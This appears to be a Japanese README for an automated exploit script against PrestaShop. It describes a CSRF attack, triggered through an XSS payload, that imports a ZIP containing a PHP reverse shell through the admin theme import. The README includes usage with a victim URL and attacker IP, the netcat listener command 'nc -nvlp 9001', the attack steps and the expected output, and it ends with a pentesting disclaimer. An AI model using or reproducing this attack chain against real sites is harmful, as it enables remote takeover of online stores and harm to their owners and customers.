
PrestaShop用の自動化されたCSRFエクスプロイトスクリプト。巧妙に作られたZIPペイロードを介してPHPリバースシェルをアップロードして実行し、接続をキャプチャするためにNetcatリスナーが必要です。
このスクリプトは、CSRF(クロスサイトリクエストフォージェリ)エクスプロイトを自動化し、ターゲットのWebサーバーにPHPリバースシェルをアップロードして実行します。リバースシェルは、細工されたCSRFペイロードを介してZIPファイルとして配信され、特権ユーザーが特定のエンドポイントと対話するとトリガーされます。このスクリプトでは、リバースシェル接続をキャプチャするために、Netcatリスナーを実行している必要があります。
現在は壊れているようです。後で更新します。
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>
target_url: ターゲットのベースURL(例:https://example.com)。admin_endpoint: 管理テーマインポートエンドポイントへのパス。admin_email: 管理者のメールアドレス(ペイロードで偽装するため)。attacker_ip: リバースシェルリスナーが接続を受信するIPアドレス。./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
attacker_ipとポート9001を使用して、revshells.comでPHPリバースシェルを生成します。love.php)をLove-exploit.zipに圧縮します。csrf_payload.html)を構築し、ターゲットの管理パネルに自動的に悪意のあるリクエストを送信してリバースシェルをインポートします。8000の一時的なHTTPサーバーが、ターゲットがインポートするためにLove-exploit.zipを提供します。マシンでNetcatリスナーを起動します:
nc -nvlp 9001
スクリプトを実行します:
./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
ターゲットがCSRFペイロードを実行し、リバースシェル接続を受信するのを待ちます。
スクリプトは実行中に以下の情報を出力します:
8000(HTTPサーバー)と9001(Netcatリスナー)が空いていることを確認してください。[*] Ensure Netcat is listening: nc -nvlp 9001
[*] Awaiting netcat listener...
[*] Creating PHP reverse shell...
[*] Packaging shell as Love-exploit.zip...
[*] Fetching CSRF token...
[+] CSRF token retrieved: <token_value>
[*] Building HTML payload for CSRF...
[*] Converting HTML to PNG...
[*] Checking for existing HTTP server on port 8000...
[*] Starting new HTTP server on port 8000 for payload delivery...
[*] Uploading XSS payload to trigger CSRF...
[*] Keeping script running to monitor for incoming connections...
このドキュメントは、管理された環境でのペネトレーションテスターおよびサイバーセキュリティ研究者による使用を目的としています。このツールを不正な目的で悪用することは固く禁止されています。
このスクリプトは教育目的および法的なサイバーセキュリティ評価のみを目的としています。許可なくシステムに対して不正使用することは違法であり、倫理ガイドラインに反します。